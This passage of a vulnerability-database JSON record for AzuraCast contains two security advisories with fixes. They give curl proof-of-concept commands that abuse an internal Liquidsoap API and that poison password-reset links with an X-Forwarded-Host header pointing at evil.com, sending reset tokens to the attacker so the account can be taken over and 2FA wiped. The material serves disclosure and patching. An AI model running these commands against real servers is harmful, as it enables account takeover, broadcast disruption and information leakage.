value).\n\n**Affected commands:**\n\n- `FeedbackCommand` (`backend/src/Radio/Backend/Liquidsoap/Command/FeedbackCommand.php:36`): Guard `if (!$asAutoDj) return false;` bypassed — creates SongHistory records and forces NowPlaying cache updates\n- `DjOffCommand` (`backend/src/Radio/Backend/Liquidsoap/Command/DjOffCommand.php:24`): Guard bypassed — calls `$this->streamerRepo->onDisconnect($station)` which ends all active broadcasts and sets `$station->is_streamer_live = false`\n- `DjOnCommand` (`backend/src/Radio/Backend/Liquidsoap/Command/DjOnCommand.php:31`): Guard bypassed — calls `$this->streamerRepo->onConnect($station, $user)` with attacker-controlled username\n- `CopyCommand` (`backend/src/Radio/Backend/Liquidsoap/Command/CopyCommand.php:18`): No `$asAutoDj` guard at all — returns absolute filesystem paths via `$mediaFs->getLocalPath($uri)`\n\n## PoC\n\n**Prerequisites:** A user account with `StationPermissions::View` on station ID 1 (the lowest station-level permission). Obtain a session cookie or API key for this user.\n\n**1. Inject arbitrary now-playing metadata (FeedbackCommand):**\n\n```bash\ncurl -X POST 'https://target/api/internal/1/liquidsoap/feedback' \\\n -H 'X-API-Key: ' \\\n -H 'X-Liquidsoap-Api-Key: anything' \\\n -H 'Content-Type: application/json' \\\n -d '{\"artist\": \"INJECTED\", \"title\": \"Fake Song Title\"}'\n```\n\nExpected: Should reject — user does not have the adapter API key.\nActual: Returns `true`. The injected artist/title appears in `/api/nowplaying/1` for all listeners.\n\n**2. Disrupt live broadcast (DjOffCommand):**\n\n```bash\ncurl -X POST 'https://target/api/internal/1/liquidsoap/djoff' \\\n -H 'X-API-Key: ' \\\n -H 'X-Liquidsoap-Api-Key: anything'\n```\n\nExpected: Should reject.\nActual: Returns `true`. All active broadcast records for the station are terminated (`timestampEnd` set), `is_streamer_live` set to `false`, and `current_streamer` cleared.\n\n**3. Disclose filesystem paths (CopyCommand):**\n\n```bash\ncurl -X POST 'https://target/api/internal/1/liquidsoap/cp' \\\n -H 'X-API-Key: ' \\\n -H 'Content-Type: application/json' \\\n -d '{\"uri\": \"test.mp3\"}'\n```\n\nExpected: Should reject — this is an internal-only endpoint.\nActual: Returns `{\"uri\":\"/var/azuracast/stations/1/media/test.mp3\",\"isTemp\":false}` — disclosing the absolute filesystem path of the station's media storage.\n\n## Impact\n\nAny user with the basic `StationPermissions::View` permission (the lowest station-level role, commonly assigned to DJs and collaborators) can:\n\n1. **Inject arbitrary now-playing metadata** visible to all listeners via the public NowPlaying API and any connected players/widgets. This poisons the song history database and triggers cache updates that propagate the false data to all consumers.\n\n2. **Disrupt live broadcasts** by terminating all active broadcast records and marking the station as having no live streamer, even when a DJ is actively broadcasting. This affects broadcast recording and live-DJ tracking.\n\n3. **Fake DJ connections** with arbitrary usernames via the `djon` command, polluting streamer logs and potentially interfering with DJ scheduling.\n\n4. **Disclose absolute filesystem paths** of the station's media storage directory via the `cp` command (no `$asAutoDj` guard required), which aids further attacks against the server.\n\n## Recommended Fix\n\n**Fix 1: Add `RequireInternalConnection` middleware to the liquidsoap route group.**\n\nIn `backend/config/routes/api_internal.php`, add the middleware to the station group:\n\n```php\n$group->group(\n '/{station_id}',\n function (RouteCollectorProxy $group) {\n $group->map(\n ['GET', 'POST'],\n '/liquidsoap/{action}',\n Controller\\Api\\Internal\\LiquidsoapAction::class\n )->setName('api:internal:liquidsoap')\n+ ->add(Middleware\\RequireInternalConnection::class);\n\n // Icecast internal auth functions\n $group->map(\n ['GET', 'POST'],\n '/listener-auth[/{api_auth}]',\n Controller\\Api\\Internal\\ListenerAuthAction::class\n )->setName('api:internal:listener-auth');\n }\n)->add(Middleware\\GetStation::class);\n```\n\n**Fix 2: Validate the API key value before setting `$asAutoDj`.**\n\nIn `backend/src/Controller/Api/Internal/LiquidsoapAction.php`, move `$asAutoDj` assignment after key validation:\n\n```php\n- $asAutoDj = $request->hasHeader('X-Liquidsoap-Api-Key');\n+ $asAutoDj = false;\n\n try {\n $acl = $request->getAcl();\n if (!$acl->isAllowed(StationPermissions::View, $station->id)) {\n $authKey = $request->getHeaderLine('X-Liquidsoap-Api-Key');\n if (!$station->validateAdapterApiKey($authKey)) {\n throw new RuntimeException('Invalid API key.');\n }\n+ $asAutoDj = true;\n+ } else {\n+ // Even ACL-authenticated users must provide valid adapter key for AutoDJ operations\n+ $authKey = $request->getHeaderLine('X-Liquidsoap-Api-Key');\n+ $asAutoDj = !empty($authKey) && $station->validateAdapterApiKey($authKey);\n }\n```\n\nBoth fixes should be applied. Fix 1 is the primary defense (defense in depth — this endpoint should never be publicly accessible). Fix 2 corrects the logic flaw so that `$asAutoDj` is only `true` when the adapter API key is actually valid, regardless of how authentication was performed.","references":[{"reference_url":"https://github.com/AzuraCast/AzuraCast","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/AzuraCast/AzuraCast"},{"reference_url":"https://github.com/AzuraCast/AzuraCast/commit/13fa7a71435629147b351d3ee151b8de6acd5c8c","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/AzuraCast/AzuraCast/commit/13fa7a71435629147b351d3ee151b8de6acd5c8c"},{"reference_url":"https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-4fm3-ggg2-c6qx","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-4fm3-ggg2-c6qx"},{"reference_url":"https://github.com/advisories/GHSA-4fm3-ggg2-c6qx","reference_id":"GHSA-4fm3-ggg2-c6qx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4fm3-ggg2-c6qx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114772?format=json","purl":"pkg:composer/azuracast/azuracast@0.23.6","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/azuracast/azuracast@0.23.6"}],"aliases":["GHSA-4fm3-ggg2-c6qx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rf68-9kxx-zff5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/94292?format=json","vulnerability_id":"VCID-xmx3-ssn9-e7gz","summary":"AzuraCast has Password Reset Poisoning via Untrusted X-Forwarded-Host Header that Leads to Account Takeover and 2FA Bypass\n## Summary\n\nThe `ApplyXForwarded` middleware unconditionally trusts the client-supplied `X-Forwarded-Host` HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker's server. The attacker then uses the token on the real instance to reset the victim's password and destroy their 2FA configuration, achieving full account takeover.\n\n## Details\n\n### Root Cause 1: Unconditional X-Forwarded-Host Trust\n\n`backend/src/Middleware/ApplyXForwarded.php:35-40`:\n```php\nif ($request->hasHeader('X-Forwarded-Host')) {\n $hasXForwardedHeader = true;\n $xfHost = Types::stringOrNull($request->getHeaderLine('X-Forwarded-Host'), true);\n if (null !== $xfHost) {\n $uri = $uri->withHost($xfHost);\n }\n}\n```\n\nThere is no validation that the request originates from a trusted reverse proxy. Any direct client can set this header and it will be accepted.\n\nIn the default Docker deployment, nginx's PHP location block (`util/docker/web/nginx/azuracast.conf.tmpl:150-171`) uses `fastcgi_pass` with `include fastcgi_params`. Standard nginx behavior passes all client HTTP headers through to PHP-FPM as `HTTP_*` parameters. The `proxy_params.conf` file — which explicitly sets `X-Forwarded-For`, `X-Forwarded-Proto`, and `X-Forwarded-Port` — only applies to `proxy_pass` directives (websocket and vite dev server), NOT to the `fastcgi_pass` PHP handler. Therefore, client-supplied `X-Forwarded-Host` reaches PHP unmodified.\n\n### Root Cause 2: Request Host Used for Security-Critical URLs\n\n`backend/src/Http/Router.php:53-77` in `buildBaseUrl()`:\n```php\n$useRequest ??= $settings->prefer_browser_url; // default: true\n\n// ...\nif ($useRequest || $baseUrl->getHost() === '') {\n $ignoredHosts = ['web', 'nginx', 'localhost'];\n if (!in_array($currentUri->getHost(), $ignoredHosts, true)) {\n $baseUrl = (new Uri())\n ->withScheme($currentUri->getScheme())\n ->withHost($currentUri->getHost())\n ->withPort($currentUri->getPort());\n }\n}\n```\n\nWith `prefer_browser_url = true` (the default at `backend/src/Entity/Settings.php:109`), the request URI host — already poisoned by `ApplyXForwarded` — is used as the base URL for generating absolute URLs. Even if a `base_url` is configured in settings, it is overridden by the poisoned request host.\n\n### Root Cause 3: Password Reset Generates Absolute URL\n\n`backend/src/Controller/Frontend/Account/ForgotPasswordAction.php:72-77`:\n```php\n$router = $request->getRouter();\n$url = $router->named(\n routeName: 'account:login-token',\n routeParams: ['token' => $token],\n absolute: true\n);\n```\n\nThis URL is embedded in the password reset email sent to the victim.\n\n### Root Cause 4: Reset Token Wipes 2FA\n\n`backend/src/Controller/Frontend/Account/LoginTokenAction.php:74-75`:\n```php\n$user->setNewPassword($data['password']);\n$user->two_factor_secret = null;\n```\n\nWhen a `ResetPassword` token is consumed, the user's 2FA secret is unconditionally destroyed.\n\n## PoC\n\n**Prerequisites:** An AzuraCast instance with a user account (e.g., `admin@target.com`) that has 2FA enabled. Attacker controls `evil.com` with a web server that logs incoming requests.\n\n### Step 1: Trigger poisoned password reset\n\n```bash\ncurl -X POST https://target.azuracast.example/forgot \\\n -H \"X-Forwarded-Host: evil.com\" \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n -d \"email=admin@target.com\"\n```\n\n**Expected result:** The password reset email sent to `admin@target.com` contains a URL like:\n```\nhttps://evil.com/login-token/abc123def456...\n```\n\n### Step 2: Capture the token\n\nWhen the victim clicks the link in their email, their browser navigates to `https://evil.com/login-token/abc123def456...`. The attacker's web server at `evil.com` captures the full URL path, extracting the token `abc123def456...`.\n\n### Step 3: Use token on real instance\n\n```bash\n# First, GET the reset page to obtain CSRF token\ncurl -c cookies.txt https://target.azuracast.example/login-token/abc123def456...\n\n# Extract CSRF token from response, then POST new password\ncurl -b cookies.txt -X POST https://target.azuracast.example/login-token/abc123def456... \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n -d \"csrf=&password=AttackerPassword123\"\n```\n\n**Result:** The victim's password is changed to `AttackerPassword123` and their 2FA is destroyed (`two_factor_secret = null`). The attacker is logged in with full access.\n\n## Impact\n\n- **Full account takeover** of any user account, including administrators, without any prior authentication\n- **2FA bypass** — the password reset flow unconditionally destroys 2FA configuration, negating its security benefit\n- **Administrative compromise** — if the target is an admin account, the attacker gains full control of the AzuraCast instance, including all stations, media, and system settings\n- The attack requires the victim to click a link in a legitimate-looking password reset email from the real AzuraCast mail system, which increases the likelihood of success\n\n## Recommended Fix\n\n**Fix 1 (Primary): Validate X-Forwarded-Host against a trusted proxy allowlist**\n\nIn `backend/src/Middleware/ApplyXForwarded.php`, only apply `X-Forwarded-*` headers when the request originates from a trusted proxy (e.g., the Docker-internal nginx):\n\n```php\n// Add trusted proxy check\n$trustedProxies = ['127.0.0.1', '::1', 'nginx', 'web'];\n$remoteAddr = $request->getServerParams()['REMOTE_ADDR'] ?? '';\n\nif (!in_array($remoteAddr, $trustedProxies, true)) {\n return $handler->handle($request);\n}\n\n// ... existing X-Forwarded-* processing\n```\n\n**Fix 2 (Defense in depth): Use configured base URL for security-critical emails**\n\nIn `ForgotPasswordAction.php`, generate the reset URL using the configured `base_url` setting rather than the request-derived URL:\n\n```php\n$router = $request->getRouter();\n$url = $router->named(\n routeName: 'account:login-token',\n routeParams: ['token' => $token],\n absolute: true,\n // Force use of configured base URL, not request host\n);\n```\n\nOr modify `Router::buildBaseUrl()` to never use request-derived hosts for absolute URLs by adding an option to force the configured base URL.\n\n**Fix 3 (Defense in depth): Don't wipe 2FA on password reset**\n\nIn `LoginTokenAction.php:75`, remove the line `$user->two_factor_secret = null;`. If 2FA recovery is needed, it should be a separate, explicit flow — not a side effect of password reset.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42606","reference_id":"","reference_type":"","scores":[{"value":"0.0007","scoring_system":"epss","scoring_elements":"0.21494","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0007","scoring_system":"epss","scoring_elements":"0.21446","published_at":"2026-06-09T12:55:00Z"},{"value":"0.0007","scoring_system":"epss","scoring_elements":"0.21435","published_at":"2026-06-08T12:55:00Z"},{"value":"0.0007","scoring_system":"epss","scoring_elements":"0.21541","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0007","scoring_system":"epss","scoring_elements":"0.21554","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42606"},{"reference_url":"https://github.com/AzuraCast/AzuraCast","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/AzuraCast/AzuraCast"},{"reference_url":"https://github.com/AzuraCast/AzuraCast/commit/7c622a18b451533de317e53862b1f84acf4efd85","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T18:00:04Z/"}],"url":"https://github.com/AzuraCast/AzuraCast/commit/7c622a18b451533de317e53862b1f84acf4efd85"},{"reference_url":"https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T18:00:04Z/"}],"url":"https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6"},{"reference_url":"https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-gv7r-3mr9-h5x8","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T18:00:04Z/"}],"url":"https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-gv7r-3mr9-h5x8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42606","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42606"},{"reference_url":"https://github.com/advisories/GHSA-gv7r-3mr9-h5x8","reference_id":"GHSA-gv7r-3mr9-h5x8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gv7r-3mr9-h5x8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114772?format=json","purl":"pkg:composer/azuracast/azuracast@0.23.6","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/azuracast/azuracast@0.23.6"}],"aliases":["CVE-2026-42606","GHSA-gv7r-3mr9-h5x8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xmx3-ssn9-e7gz"}],"fixing_vulnerabilities":[],"risk_score":"4.0","resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/azuracast/azuracast@0.23.3"}